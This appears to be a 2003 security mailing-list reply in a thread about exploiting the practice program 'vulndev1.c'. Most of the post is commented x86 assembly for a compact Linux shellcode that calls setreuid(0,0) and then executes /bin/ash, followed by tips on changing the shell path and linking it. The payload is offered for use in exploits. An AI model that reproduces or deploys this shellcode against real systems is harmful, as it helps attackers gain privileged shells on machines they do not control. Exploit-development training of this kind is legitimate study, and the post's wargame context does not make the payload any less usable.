Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)
From: sin (sin_at_insolence.net)
Date: 05/23/03
- Previous message: sin: "Re: Is this exploitable?"
- In reply to: Jon Erickson: "Re: CORRECTION: vulndev1.c solution (WARNING! QUESTIONS!)"
Date: Fri, 23 May 2003 11:06:56 -0500 (CDT) To: Jon Erickson <matrix@phiral.com>
I haven't really been following the thread too much, although I did take a
look at the code (vulndev1.c). Anyway, if someone is having a problem with
shellcode, here is the asm for a generic sys_setreuid/execve shellcode
that's on the smaller side.
.section .text
.global _s
_s:
    xorl %ebx, %ebx          # ebx = 0 (ruid)
    xorl %ecx, %ecx          # ecx = 0 (euid)
    movb $0x46, %al          # sys_setreuid
    int $0x80
    xorl %eax, %eax          # eax = 0, also used as the NUL terminator
    pushl %eax
    pushl $0x6873612f        # "/ash"
    pushl $0x6e69622f        # "/bin"
    movl %esp, %ebx          # ebx -> "/bin/ash"
    pushl %eax               # argv[1] = NULL
    pushl %ebx               # argv[0] = "/bin/ash"
    movl %esp, %ecx          # ecx -> argv
    xorl %edx, %edx          # edx = NULL (envp)
    movb $0xb, %al           # sys_execve
    int $0x80
Ah, this calls /bin/ash. If you don't have it, change the string and make
sure to pass the -e flag to ld. It's small; it comes out to like 20+ bytes or
similar, I can't remember.
If I misread a post, well, ignore me.
"Once set in motion, the process of questioning could come to but one end,
the erosion of conviction and certitude and collapse into despair" (The
Specter of the Absurd, 1988).